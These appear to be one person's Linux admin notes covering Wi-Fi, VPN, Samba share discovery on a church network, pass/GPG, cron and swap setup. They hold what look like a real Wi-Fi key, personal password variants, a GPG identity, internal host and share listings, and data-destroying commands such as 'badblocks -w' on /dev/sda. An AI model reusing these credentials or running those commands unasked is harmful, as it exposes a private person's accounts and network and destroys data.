Search for files modified in the past 7 days.
-mtime -7
---[OpenVPN]--- (top)
Start a connection with an auto-login profile manually:
openvpn --config client.ovpn
Start a connection with a user-locked profile manually:
openvpn --config client.ovpn --auth-user-pass
https://support.strongvpn.com/hc/en-us/articles/360004594693-OpenVPN-Setup-Ubuntu-Linux-Command-Line https://openvpn.net/vpn-server-resources/connecting-to-access-server-with-linux/
---[Connecting to Wifi]--- (top)
Get the name of your network device
ben@ben-b:~$ iw dev phy#1 Interface wlx7cdd90ebf32e ifindex 4 wdev 0x100000001 addr 7c:dd:90:eb:f3:2e ssid ATTFJ4Br3A type managed channel 136 (5680 MHz), width: 40 MHz, center1: 5670 MHz txpower 23.00 dBm phy#0 Interface wlp2s0 ifindex 3 wdev 0x1 addr c0:f8:da:79:de:fc ssid ATTFJ4Br3A_5GEXT type managed
Check the Wi-Fi device connection status
root@ben-b:~# iw wlp2s0 link Connected to bc:a5:11:99:2e:3a (on wlp2s0) SSID: ATTFJ4Br3A_5GEXT freq: 5765 signal: -53 dBm tx bitrate: 162.0 MBit/s
Scan available Wi-Fi networks
ben@ben-b:~$ sudo iw wlp2s0 scan BSS bc:a5:11:99:2e:3a(on wlp2s0) -- associated TSF: 0 usec (0d, 00:00:00) freq: 5765 beacon interval: 100 TUs capability: ESS Privacy ShortSlotTime (0x0411) signal: -53.00 dBm last seen: 0 ms ago SSID: ATTFJ4Br3A_5GEXT Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
Bring the interface UP if needed
ben@ben-b:~$ sudo ip link set wlp1s0 up
If you get the following error, your Wifi is hard blocked p>
RTNETLINK answers: Operation not possible due to RF-kill
Remove or unblock
ben@ben-b:~$ sudo rfkill unblock all
$ nmcli dev wifi connect ATTFJ4Br3A_5GEXT ThePassword
verify your connectivity
ben@ben-b:~$ ping 8.8.8.8
---[Findout which AP(s) you are connected to]--- (top)
ben@ben-b:~$ iwconfig lo no wireless extensions. eno1 no wireless extensions. wlp2s0 IEEE 802.11 ESSID:"ATTFJ4Br3A_5GEXT" Mode:Managed Frequency:5.765 GHz Access Point: BC:A5:11:99:2E:3A Retry short limit:7 RTS thr:off Fragment thr:off Power Management:on wlx7cdd90ebf32e IEEE 802.11 ESSID:"ATTFJ4Br3A" Mode:Managed Frequency:5.68 GHz Access Point: C6:52:61:97:05:B3 Bit Rate=162 Mb/s Tx-Power=23 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Power Management:on Link Quality=60/70 Signal level=-50 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:48 Missed beacon:0
---[System Report]--- (top)
ben@ben-b:~$ inxi -Fz System: Host: ben-b Kernel: 5.3.0-46-generic x86_64 bits: 64 Desktop: Cinnamon 4.4.8 Distro: Linux Mint 19.3 Tricia Machine: Type: Laptop System: Dell product: Latitude E6520 v: 01 serial: <filter> Mobo: Dell model: 0NVF5K v: A01 serial: <filter> BIOS: Dell v: A21 date: 03/06/2018 Battery: ID-1: BAT0 charge: 21.7 Wh condition: 21.7/60.0 Wh (36%) CPU: Topology: Dual Core model: Intel Core i5-2540M bits: 64 type: MT MCP L2 cache: 3072 KiB Speed: 1350 MHz min/max: 800/3300 MHz Core speeds (MHz): 1: 1255 2: 1179 3: 2491 4: 1198 Graphics: Device-1: Intel 2nd Generation Core Processor Family Integrated Graphics driver: i915 v: kernel Display: x11 server: X.Org 1.20.5 driver: modesetting unloaded: fbdev,vesa resolution: 1366x768~60Hz OpenGL: renderer: Mesa DRI Intel Sandybridge Mobile v: 3.3 Mesa 19.2.8 Audio: Device-1: Intel 6 Series/C200 Series Family High Definition Audio driver: snd_hda_intel Sound Server: ALSA v: k5.3.0-46-generic Network: Device-1: Intel 82579LM Gigabit Network driver: e1000e IF: eno1 state: down mac: <filter> Device-2: Broadcom and subsidiaries BCM43228 802.11a/b/g/n driver: wl IF: wlp2s0 state: up mac: <filter> Device-3: Ralink RT5572 Wireless Adapter type: USB driver: rt2800usb IF: wlx7cdd90ebf32e state: up mac: <filter> Drives: Local Storage: total: 931.51 GiB used: 74.79 GiB (8.0%) ID-1: /dev/sda vendor: Western Digital model: WD10SPZX-22Z10T1 size: 931.51 GiB Partition: ID-1: / size: 914.21 GiB used: 74.31 GiB (8.1%) fs: ext4 dev: /dev/dm-1 ID-2: /boot size: 703.5 MiB used: 486.7 MiB (69.2%) fs: ext4 dev: /dev/sda1 ID-3: swap-1 size: 976.0 MiB used: 0 KiB (0.0%) fs: swap dev: /dev/dm-2 Sensors: System Temperatures: cpu: 46.0 C mobo: 22.0 C sodimm: 28.0 C Fan Speeds (RPM): cpu: 0 Info: Processes: 250 Uptime: 22h 24m Memory: 15.52 GiB used: 5.20 GiB (33.5%) Shell: bash inxi: 3.0.32
---[List APs]--- (top)
ben@ben-b:~$ sudo nmcli dev wifi IN-USE SSID MODE CHAN RATE SIGNAL BARS SECURITY * ATTFJ4Br3A_5GEXT Infra 153 270 Mbit/s 67 ▂▄▆_ WPA2 IN-USE SSID MODE CHAN RATE SIGNAL BARS SECURITY * ATTFJ4Br3A Infra 136 540 Mbit/s 68 ▂▄▆_ WPA2
ben@ben-b:~$ nmcli -f ALL dev wifi NAME SSID SSID-HEX BSSID MODE CHAN FREQ RATE AP[1] ATTFJ4Br3A_5GEXT 415454464A34427233415F3547455854 BC:A5:11:99:2E:3A Infra 153 5765 MHz 270 Mbi NAME SSID SSID-HEX BSSID MODE CHAN FREQ RATE SIGNAL BARS AP[1] ATTFJ4Br3A 415454464A3442723341 C6:52:61:97:05:B3 Infra 136 5680 MHz 540 Mbit/s 66 ▂▄▆_
---[Setup for Misbehaving]--- (top)
Setup
---[Find the GPU driver version]--- (top)
ben@ben-b:~$ sudo update-pciids Downloaded daily snapshot dated 2020-05-17 03:15:02 ben@ben-b:~$ lspci -v | less 00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09) (prog-if 00 [VGA controller]) Subsystem: Dell 2nd Generation Core Processor Family Integrated Graphics Controller Flags: bus master, fast devsel, latency 0, IRQ 33 Memory at e1400000 (64-bit, non-prefetchable) [size=4M] Memory at d0000000 (64-bit, prefetchable) [size=256M] I/O ports at 4000 [size=64] [virtual] Expansion ROM at 000c0000 [disabled] [size=128K] Capabilities: Kernel driver in use: i915 Kernel modules: i915
This laptop has both an Intel Core GPU and an NVIDIA GeForce 610M. However, both cards have the “[VGA controller]” string, which usually indicates which GPU is in use.
---[Watch]--- (top)
For CPU temps, we will combine watch with the sensors command.
watch -n 2 sensors
---[USB Types and Info]--- (top)
---[Test for Bad Sectors]--- (top)
To test and detect bad sector in USB flash memory or pen drive, run:
badblocks -w -s -o error.log /dev/sdX
To error check USB flash drive, you can use the f3write and f3read commands, which is an alternative to h2testw app from Windows operating systems.
First, find out your USB stick or flash drive name under Linux, run:
lsblk
Warning: This will destroy any previously stored data on your USB pen/stick. Make sure you choose correct USB device name under Linux.
Once inserted the USB pen/stick, run the following command to search a device for bad blocks:
sudo badblocks -w -s -o error.log /dev/sda
Lots of good info at, https://www.cyberciti.biz/faq/linux-check-the-physical-health-of-a-usb-stick-flash-drive/ about USB repair.
---[Connecting to WiFi from the command line]--- (top)
Make sure your WiFi interface is up:
ifconfig wlan0 up
Find the AP you want to connect to:
iwlist wlan0 scan ESSID:"CCCCPublic" 8A:DC:96:47:D0:AE
Connect to the AP:
iwconfig wlan0 essid CCCCPublic keys:!XD247365!
rfkill list rfkill unblock all iwconfig sudo ifconfig wlan0 up sudo iwlist wlan0 scan | grep ESSID
sudo apt install wpasupplicant wpa_passphrase
$ ip link sho 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: eth0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state DOWN mode DEFAULT group default qlen 1000 link/ether 74:86:7a:5d:35:b1 brd ff:ff:ff:ff:ff:ff 3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000 link/ether fc:f8:ae:26:86:ee brd ff:ff:ff:ff:ff:ff
---[Samba]--- (top)
To mount a samba share from the command line:
$ cd ~ $ mkdir smbshare $ sudo mount -t cifs //ipaddress/share smbshare -o user=myusername,pass=mypassword
$ sudo systemctl stop smbd $ sudo systemctl stop nmbd $ sudo systemctl start smbd $ sudo systemctl start nmbd
ben@ben-b:~$ findsmb *=DMB +=LMB IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION --------------------------------------------------------------------- 10.32.10.223 BEN-B [ WORKGROUP ]
ben@ben-b:~$ smbclient -L bkupsrv WARNING: The "syslog" option is deprecated Enter WORKGROUP\ben's password: Sharename Type Comment --------- ---- ------- bkupsrv Disk print$ Disk Printer Drivers IPC$ IPC IPC Service (bkupsrv server (Samba, Ubuntu)) Brother_MFC_J497DW_Billie_s_MacBook_Pro Printer Brother MFC-J497DW HP_Officejet_5740_series_710C28_ Printer HP_Officejet_5740_series_710C28_ RICOH_MP_C4504ex_002673E8869C_ Printer HP_Officejet_Pro_8610_Billie_s_MacBook_Pro Printer HP Officejet Pro 8610 HP_Officejet_5740_series_710C28_@HPA08CFD710C28.local Printer Brother_PT_2730_2_MacBook_Pro_Steve_i9 Printer Brother PT-2730-2 Samsung_C410_Series_Streaming_MacBook Printer Samsung C410 Series Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- CHURCH VOLUNTEER WORKGROUP BKUPSRV
Lists Domain, OS, Server, Computers, Shares, and Workgroup
smbtree [ Lists all your machines and shares ]
hostname [ Your hostname ]
nmblookup -S WORKGROUP [ Lists Netbios, and internal IP's ]
nmblookup -T WORKGROUP [ List Netbios, and IP for any machines that are shariing services. ]
testparm -s [ Lists Server Role, Shares and their attributes, also Checks services. ]
testparm [ Same as above command, but gives you the option to display more info. ]
ben@benb:~$ smbtree WORKGROUP \\VIDEOS-IMAC Video's iMac \\TLANE-PC \\SYNOLOGYROUTER \\STEVENSMITH-PC \\STEVENS-TIME-CA Steven's Time Capsule \\STEVENS-TIME-CA\IPC$ \\RNP002673E8869C \\RNP002673E8869C\IPC$ \\RNP002673E8869C\MPC4504EX \\OPTEC-5S9E6SIUZ \\MACMINI-C9CDCF Side Screen Mac Mini \\MACBOOKPRO-ED70 MacBook Pro Steve i9 \\MACBOOKPRO-22E2 Student Computer (3) \\MAC-MINI Mac mini \\LINKSYS05546 Samba 3.0.28a \\LIGHTS-MAC-MINI Lights Mac Mini \\LAPTOP-0JA6K8OQ \\DESKTOP-TC4L78D \\DESKTOP-SCREVEC \\DESKTOP-DIFC89T \\BENB benb server (Samba, Ubuntu) \\BENB\HP-Officejet-5740-series HP Officejet 5740 series \\BENB\Ricoh-MP-C4504ex Ricoh MP C4504ex \\BENB\Brother_PT_2730_2_MacBook_Pro_Steve_i9 Brother PT-2730-2 \\BENB\RICOH_MP_C4504ex_002673E8869C_Lincoln_s_MacBook_Pro RICOH MP C4504ex [002673E8869C] \\BENB\IPC$ IPC Service (Samba 4.7.6-Ubuntu) \\BENB\print$ Printer Drivers CHURCH \\VOLUNTEER \\VOLUNTEER\print$ Printer Drivers \\VOLUNTEER\IPC$ Remote IPC CAPCITY \\STAFF CCCC Staff Server \\MEDIA CCCC Media Server \\MEDIA\Users \\MEDIA\Media H Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014 \\MEDIA\Media G Bios lists as 00:04 - in slot 5 - installed 02/23/2014 \\MEDIA\K$ Default share \\MEDIA\IPC$ Remote IPC \\MEDIA\H$ Default share \\MEDIA\G$ Default share \\MEDIA\F$ Default share \\MEDIA\E$ Default share \\MEDIA\E \\MEDIA\C$ Default share \\MEDIA\ADMIN$ Remote Admin \\JON-SUTPHIN-PC \\BKUPSRV bkupsrv server (Samba, Ubuntu) \\BKUPSRV\Brother_PT_2730_2_MacBook_Pro_Steve_i9 Brother PT-2730-2 \\BKUPSRV\RICOH_MP_C4504ex_002673E8869C_Lincoln_s_MacBook_Pro RICOH MP C4504ex [002673E8869C] \\BKUPSRV\HP_Officejet_5740_series_710C28_ HP_Officejet_5740_series_710C28_ \\BKUPSRV\IPC$ IPC Service (bkupsrv server (Samba, Ubuntu)) \\BKUPSRV\print$ Printer Drivers \\BKUPSRV\bkupsrv Backup Server ben@benb:~$
ben@benb:~$ smbd --version Version 4.7.6-Ubuntu
ben@ben-b:~$ systemctl status smbd nmbd smbd.service - Samba SMB Daemon Loaded: loaded (/lib/systemd/system/smbd.service; enabled; vendor preset: enabled) Active: active (running) since Wed 2020-06-10 10:29:50 EDT; 5h 13min ago Docs: man:smbd(8) man:samba(7) man:smb.conf(5) Main PID: 2092 (smbd) Status: "smbd: ready to serve connections..." Tasks: 4 (limit: 4915) CGroup: /system.slice/smbd.service ├─2092 /usr/sbin/smbd --foreground --no-process-group ├─2099 /usr/sbin/smbd --foreground --no-process-group ├─2100 /usr/sbin/smbd --foreground --no-process-group 2105 /usr/sbin/smbd --foreground --no-process-group Jun 10 10:29:44 ben-b systemd[1]: Starting Samba SMB Daemon... Jun 10 10:29:50 ben-b systemd[1]: Started Samba SMB Daemon. Jun 10 15:40:25 ben-b smbd[24075]: pam_unix(samba:session): session closed for user nobody Jun 10 15:40:25 ben-b smbd[24074]: pam_unix(samba:session): session closed for user nobody nmbd.service - Samba NMB Daemon Loaded: loaded (/lib/systemd/system/nmbd.service; enabled; vendor preset: enabled) Active: active (running) since Wed 2020-06-10 10:29:44 EDT; 5h 13min ago Docs: man:nmbd(8) man:samba(7) man:smb.conf(5) Main PID: 1551 (nmbd) Status: "nmbd: ready to serve connections..." Tasks: 1 (limit: 4915) CGroup: /system.slice/nmbd.service 1551 /usr/sbin/nmbd --foreground --no-process-group
ben@benb:~$ smbclient -L staffsrv Connection to staffsrv failed (Error NT_STATUS_UNSUCCESSFUL) ben@benb:~$ smbtree WORKGROUP \\VIDEOS-IMAC Video's iMac \\STEVENSMITH-PC \\STEVENS-TIME-CA Steven's Time Capsule \\STEVENS-TIME-CA\IPC$ \\RNP002673E8869C \\RNP002673E8869C\IPC$ \\RNP002673E8869C\MPC4504EX \\OPTEC-5S9E6SIUZ \\LYRICS-MAC-MINI Lyrics Mac Mini \\LINKSYS05546 Samba 3.0.28a \\LIGHTS-MAC-MINI Lights Mac Mini CAPCITY \\STAFF CCCC Staff Server \\MEDIA CCCC Media Server \\MEDIA\Users \\MEDIA\Media H Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014 \\MEDIA\Media G Bios lists as 00:04 - in slot 5 - installed 02/23/2014 \\MEDIA\K$ Default share \\MEDIA\IPC$ Remote IPC \\MEDIA\H$ Default share \\MEDIA\G$ Default share \\MEDIA\F$ Default share \\MEDIA\E$ Default share \\MEDIA\E \\MEDIA\C$ Default share \\MEDIA\ADMIN$ Remote Admin \\JON-SUTPHIN-PC \\BKUPSRV bkupsrv server (Samba, Ubuntu) \\BKUPSRV\HP_Officejet_Pro_8610_Billie_s_MacBook_Pro HP Officejet Pro 8610 \\BKUPSRV\HP_Officejet_5740_series_710C28_ HP_Officejet_5740_series_710C28_ \\BKUPSRV\Brother_MFC_J497DW_Billie_s_MacBook_Pro Brother MFC-J497DW \\BKUPSRV\IPC$ IPC Service (bkupsrv server (Samba, Ubuntu)) \\BKUPSRV\print$ Printer Drivers \\BKUPSRV\bkupsrv Backup Server \\BENB Samba 4.7.6-Ubuntu \\BENB\HP-Officejet-5740-series HP Officejet 5740 series \\BENB\Ricoh-MP-C4504ex Ricoh MP C4504ex \\BENB\RICOH_MP_C4504ex_002673E8869C_ RICOH_MP_C4504ex_002673E8869C_ \\BENB\IPC$ IPC Service (Samba 4.7.6-Ubuntu) \\BENB\print$ Printer Drivers ben@benb:~$
C:\> net use \\samba-server-ip\share-name /delete
C:\> net use \\10.32.10.155\bkupsrv /delete
$ sudo umount /media/ben/bkupsrv
Ref: https://www.linuxbabe.com/ubuntu/install-samba-server-file-share
---[multi-subnets]--- (top)
Having more than one subnet on a LAN used to be more common than it is today. You can configure the router interface with a secondary* address. This will allow the router to be the gateway for both subnets, and it will be able to route between them.
*You can have more than just two subnets on a LAN. Cisco refers to them all as secondary addresses although they technically should be called tertiary, quartenary, etc.
The subnet is used to determine what hosts are "assumed to be on link". If a host wants to communicate with a host outside it's subnet then (assuming there is nothing special in the host's routing table) it will try and send the packet to it's default gateway.
If the default gateway knows about all the subnets and is prepared to send packets back out on the same interface they came in through then communication will work fine. Otherwise things are going to break.
When the default gateway notices that it is sending a packet back out the way it came in it may send ICMP redirect packets to inform the host that it can send the packet by a more direct route. The sending host may or may not take notice of said redirect.
Two different subnets are two separate broadcast domains. The only device that can traverse multiple broadcast domains is a L3-aware device (router, firewall, multilayer switch etc.).
https://blog.biamp.com/the-difference-between-vlans-and-subnets/
---[Wireshark Expressions for Dante]--- (top)
igmp&&ipaddr==xxx.xxx.xxx.xxx
Verifying networked audio (Q-SYS / Dante) with Wireshark? Hi all, I'm not new to Q-SYS or Dante. I'm familiar with configuring switches and such. I do need to wrap my head around a few things. I'm mainly looking for pointers to verifying switch configuration when I'm relying on client IT folks to configure their switches for Q-LAN. If I capture data with Wireshark out of a Q-SYS core directly, I get flooded with PTPv2. This makes sense to me. If I plug my laptop and core into a switch, should I see the same PTPv2 data on Wireshark? If I don't, is that an indication that unregistered multicast is blocked? Should Q-LAN audio work if I don't see PTP? Next, how can I verify the DSCP priorities are configured properly in a switch by looking at packets in Wireshark. I know how to get a column for DSCP, but most packets just show "default". Thanks all! If you have set up your igmp querier and snooping correctly you can filter in wire shark by using simply “igmp” as the filter (no quotes). You should see membership reports and leave groups on the laptop as it is plugged into the switch. Same with ip video encoders/decoders. You can drill deeper by using the filter “igmp∓∓ipaddr==xxx.xxx.xxx.xxx” again no quotes and replace the x’s with the IP address you wish to filter. Every layer3 switch I’ve configured also has an igmp table that should list all the devices found by the querier/snooping in one list so you can see if your devices are connected. Keep in mind if you are using vlans to make sure igmp snooping and queries are setup for that particular vlan as well as the default vlan. Edit to add. For QoS DSCP values QSC has pretty detailed setup guides for a large selection of switches on their website. Do a google search for qsc qualified switches and you can access the guides there. In some cases there are very specific QoS instructions for when qlan and Dante exist on the same network. There are even settings within the core for packet prioritizing dante and qlan when residing on the same network. I’ve asked about how they go about determining the right values and haven’t received a solid answer other than Marko is the person who does a lot of the QoS details. Marko Fred and cookie are the three guys there that really know the ins and outs of that side of it. Give them a call if you want to get specifics though they are harder and harder to reach these days as Q-Sys popularity gains speed. About the QoS values when doing mixed Dante/qsys network: Audinate has locked the DSCP values for Ptp, audio and discovery. Qsc recently allowed these to be changed in order to comply with larger setups. This solves situations where qlan and Dante vlans need to share the same trunk ports. Dante DSCP values can be found by googling. Correct QoS settings on a switch are very hard to measure (unless you have access to switch config and can take a look). Incorrect settings will manifest as problem with lots of traffic and/or mixed gigabit and 100mb ports. https://www.reddit.com/r/CommercialAV/comments/8rg0lq/ verifying_networked_audio_qsys_dante_with/
---[Kazam Screen Recording]--- (top)
To install kazam;
sudo add-apt-repository ppa:sylvain-pineau/kazam sudo apt-get update sudo apt install kazam
---[pass]--- (top)
Setting up GNUPG based pass system
gpg --list-keys /home/ben/.gnupg/pubring.kbx ---------------------------- pub rsa3072 2020-12-03 [SC] 96606AD4E8214AF6EE20F84805AE85193A16AC7B uid [ultimate] William Ben Bellamy Jr sub rsa3072 2020-12-03 [E] sub rsa4096 2020-12-03 [E]
So you run this command to set a password store for the above GPG pass init 96606AD4E8214AF6EE20F84805AE85193A16AC7B
One approach is to use the multi-line functionality of pass (--multiline or -m in insert), and store the password itself on the first line of the file, and the additional information on subsequent lines. For example, Amazon/bookreader might look like this:
Yw|ZSNH!}z"6{ym9pI URL: *.amazon.com/* Username: AmazonianChicken@example.com Secret Question 1: What is your childhood best friend's most bizarre superhero fantasy? Oh god, Amazon, it's too awful to say... Phone Support PIN #: 84719
Another approach is to use folders, and store each piece of data inside a file in that folder. For example Amazon/bookreader/password would hold bookreader's password inside the Amazon/bookreader directory, and Amazon/bookreader/secretquestion1 would hold a secret question, and Amazon/bookreader/sensitivecode would hold something else related to bookreader's account. And yet another approach might be to store the password in Amazon/bookreader and the additional data in Amazon/bookreader.meta. And even another approach might be use multiline, as outlined above, but put the URL template in the filename instead of inside the file.
Insert a new password record
$ pass insert archlinux.org/wiki/username
We’ll insert an existing password of ours with pass insert, giving it a descriptive hierarchical name:
$ pass insert google.com/gmail/example@gmail.com mkdir: created directory ‘/home/tom/.password-store/google.com’ mkdir: created directory ‘/home/tom/.password-store/google.com/gmail’ Enter password for google.com/gmail/example@gmail.com: Retype password for google.com/gmail/example@gmail.com:
To get a view of the password store do the following. Note the example output which shows the hierarchy we just created. $ pass
To generate a new random password for the above example, do the following, where n is the desired password length as a number:
$ pass generate archlinux.org/wiki/username n
To retrieve a password, enter the gpg passphrase at the following prompt, again using the example name from above:
$ pass archlinux.org/wiki/username
You can edit an existing file the way you want with command pass edit password_name.
If you’d like it to generate a new secure random password for you, you can use generate instead, including a password length as the last argument:
$ pass generate google.com/gmail/example@gmail.com 16 The generated password to google.com/gmail/example@gmail.com is: !Q%i$$&q1+JJi-|X
If we need to change an existing password, we can either overwrite it with insert again, or use the edit operation to invoke our choice of $EDITOR:
$ pass edit google.com/gmail/example@gmail.com
This password can now be retrieved and echoed onto the command line given the appropriate passphrase:
$ pass google.com/gmail/example@gmail.com (...gpg-agent pinentry prompt...) Tr0ub4dor&3
If you would like it copied to your clipboard automatically you can use the -c flag pass -c test
If we no longer need the password, we can remove it with pass rm:
$ pass rm google.com/gmail/example@gmail.com Are you sure you would like to delete google.com/gmail/example@gmail.com? [y/N] y removed ‘/home/tom/.password-store/google.com/gmail/example@gmail.com.gpg’
We can delete whole directories of passwords with pass rm -r:
$ pass rm -r google.com Are you sure you would like to delete google.com? [y/N] y removed ‘/home/tom/.password-store/google.com/gmail/example@gmail.com.gpg’ removed directory: ‘/home/tom/.password-store/google.com/gmail’ removed directory: ‘/home/tom/.password-store/google.com’
Because the password files are all encrypted only to your GnuPG key, you can relatively safely back up the store on remote and third-party sites simply by copying the ~/.password-store directory. If the filenames themselves contain sensitive information, such as private usernames or sites, you might like to back up an encrypted tarball of the store instead:
$ tar -cz .password-store \ | gpg --sign --encrypt -r 0x77BB8872 \ > password-store-backup.tar.gz.gpg
This directory can be restored in a similar way:
$ gpg --decrypt \ @lt; password-store-backup.tar.gz.gpg \ | tar -xz
---[namei]--- (top)
On some systems, the utility namei can be used to help find permissions problems by listing the permissions along each component of the path:
$ namei -m /var/www/html/cgi-bin/test.pl f: /var/www/html/cgi-bin/test.pl drwxr-xr-x / drwxr-xr-x var drwxr-xr-x www drwxr-xr-x html drwxr-xr-x cgi-bin -rwxrwx--- test.pl
---[Renaming files/folders en mass]--- (top)
Renaming files/folders with trailing spaces so that Linux cp works properly.
This will rename all file changing a trailing space to an underscore; rename 's/ /_/g' * The -n (dry-run) shows what would happen. Remove the -n to actually make the rename changes; rename -n 's/ *$//' * To remove files or folders that are empty (recursively) : find . -empty Satisfied with that test, Let the action take place : find . -empty -delete Also use -type f for only files and -type d for only directories if you want. for f in *; do mv "$f" .echo $f | tr ' ' '_'.; done This is the original example; for file in *.doc *.mp3 *.wav *.txt do mv -- "$file" "${file// /_}" done # This will identify files that end with a space; for file in *' ' do ls -- "$file" done # This will rename each file so that the single trailing space is changed to an underscore; for file in *' ' do mv -- "$file" "${file// /_}" done # This will rename each file so that the single trailing underscore is removed; for file in *'_' do mv -- "$file" "${file//_/}" done
---[Typing Unicode]--- (top)
In xfce, press and hold Ctrl+Shift+U then release. Next type the the hex code/value for the character you want entered, then press enter and the Unicode character will be displayed on the shell command line.
Type Ctrl+U to drop out of unicode typing.
https://en.wikipedia.org/wiki/Unicode_input
P Ɉ Ⴒ ᵱ L ƪ ɭ&# U ʊ Կ ᶙ G ǥ ᦋ
'HaShem Nnarana7h@ ' 'HaShem^Nnaran@7ha ' 'HaShem Nn@rana7ha^' 'HaShem Nnarana7h@^' 'HaShem Nnaran@7ha^' HaShem Nnaran@7ha^Ϯ HaShem Nnaran@7ha^[space][Ctrl+Shift+u]03ee[Ctrl+u][enter] 'HaShem @d0nai^' 'HaShem🙏Adonai^ ' 'HaShenn🙏Adonai^ ' 'HaShenn🙏Adonai^ ' HaShenn [Ctrl+Shift+u]03ee[Ctrl+u]Adonai^ ' 🙏 U+1F64F 🙌 U+1F64C ♱ U+2670 ♰ U+2671 ✞ U+271e 🕆 U+1F546 🕇 U+1F547 🕈 U+1F548 Ϯ 03ee ϯ 03ef
---[Ramdisk & Swap]--- (top)
Create a mount point
sudo mkdir /mnt/ramdisk
Mount the ramdisk
mount -t tmpfs -o size=1024m tmpfs /mnt/ramdisk
Edit the /etc/fstab file to make this ramdisk persistant (though its contents will be lost every reboot).
Add this line to /etc/fstab
tmpfs /mnt/ramdisk tmpfs nodev,nosuid,noexec,nodiratime,size=1024M 0 0
To see which swap space is active on your UNIX/Linux system run the following command in a terminal:
root@ben-b:/mnt/ramdisk# /sbin/swapon -s Filename Type Size Used Priority /dev/dm-2 partition 999420 1076 -2
Also,
root@ben-b:/mnt/ramdisk# /sbin/swapon --show=NAME,TYPE,SIZE,USED,PRIO NAME TYPE SIZE USED PRIO /dev/dm-2 partition 976M 1.1M -2
As a general rule the size of the swap space it is recommended to be twice as much as the system has physical memory. Keep this in mind for general-purpose setups and desktop machines.
This is an example of creating a swap file, rather than a ramdisk. As an example, we create a file named /swapfile with a size of 512M, and enable this as additional swap space.
# dd if=/dev/zero of=/swapfile bs=1024 count=524288 524288+0 datasets in 524288+0 datasets out 536870912 bytes (537 MB) copied, 0,887744 s, 605 MB/s # mkswap /swapfile Setting up swapspace version 1, size = 524284 KiB no label, UUID=e47ab7fe-5efc-4175-b287-d0e83bc10f2e # swapon /swapfile # swapon --show=NAME,TYPE,SIZE,USED,PRIO NAME TYPE SIZE USED PRIO /dev/dm-3 partition 15,4G 288,9M -1 /swapfile file 512M 0B -2 #
Least but not last there is one command to disable the swap file, again. The command is called swapoff. It requires a single parameter that indicates the swap device to be disabled. This command disables the previously activated swap file:
# swapoff /swapfile
There is more on this reference page that I need to go through and flesh out.
And this might be a better reference, specifically for a ramdisk.
https://linuxhint.com/ramdisk_ubuntu_1804/ Ref:https://www.jamescoyle.net/how-to/943-create-a-ram-disk-in-linux
Ref:https://www.jamescoyle.net/how-to/943-create-a-ram-disk-in-linux
---[cron]--- (top)
The crontab -e command is used to edit a cron file.
Using the crontab command not only allows you to edit the command, it also restarts the crond daemon when you save and exit the editor.
# crontab -e SHELL=/bin/bash MAILTO=root@example.com PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
# For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed * * * * * command to be executed - - - - - | | | | | | | | | ----- Day of week (0 - 7) (Sunday=0 or 7) | | | ------- Month (1 - 12) | | --------- Day of month (1 - 31) | ----------- Hour (0 - 23) ------------- Minute (0 - 59)
By default the output of a command or a script (if any produced), will be email to your local email account. To stop receiving email output from crontab you need to append >/dev/null 2>&1. For example:
0 3 * * * /root/backup.sh >/dev/null 2>&1
To mail output to particular email account let us say vivek@nixcraft.in you need to define MAILTO variable as follows:
MAILTO="vivek@nixcraft.in" 0 3 * * * /root/backup.sh >/dev/null 2>&1
List all cron jobs
# crontab -l
To remove or erase all crontab jobs use the following command:
# Delete the current cron jobs # crontab -r
Instead of the first five fields, you can use any one of eight special strings. It will not just save your time but it will improve readability.
Special string Meaning @reboot Run once, at startup. @yearly Run once a year, “0 0 1 1 *”. @annually (same as @yearly) @monthly Run once a month, “0 0 1 * *”. @weekly Run once a week, “0 0 * * 0”. @daily Run once a day, “0 0 * * *”. @midnight (same as @daily) @hourly Run once an hour, “0 * * * *”.
Run ntpdate command every hour:
@hourly /path/to/ntpdate
Make a backup everyday:
@daily /path/to/backup/scri
/etc/crontab is system crontabs file. Usually only used by root user or daemons to configure system wide jobs. All individual user must must use crontab command to install and edit their jobs as described above. /var/spool/cron/ or /var/cron/tabs/ is directory for personal user crontab files. It must be backup with users home directory.
Typical /etc/crontab file entries:
SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # run-parts 01 * * * * root run-parts /etc/cron.hourly 02 4 * * * root run-parts /etc/cron.daily 22 4 * * 0 root run-parts /etc/cron.weekly 42 4 1 * * root run-parts /etc/cron.monthly
First, the environment must be defined. If the shell line is omitted, cron will use the default, which is sh. If the PATH variable is omitted, no default will be used and file locations will need to be absolute. If HOME is omitted, cron will use the invoking users home directory.
Viewing the cron log:
cat /var/log/cron tail -f /var/log/cron grep "my-script.sh" tail -f /var/log/cron
sudo systemctl status cron
Ref: https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
---[Installing cpan on Linux Mint]--- (top)
Start with this...
$ sudo apt-get install libpath-tiny-perl $ sudo cpan -i MIME::Lite $ sudo apt-get install libpath-tiny-perl
We can run the installation process without entering CPAN shell-like below.
$ sudo cpan -i MIME::Lite sudo cpan -i Spreadsheet::Write sudo cpan -i Nmap::Parser sudo cpan -i DBD::SQLite
Ref. https://www.poftut.com/how-to-install-perl-modules-with-cpan/
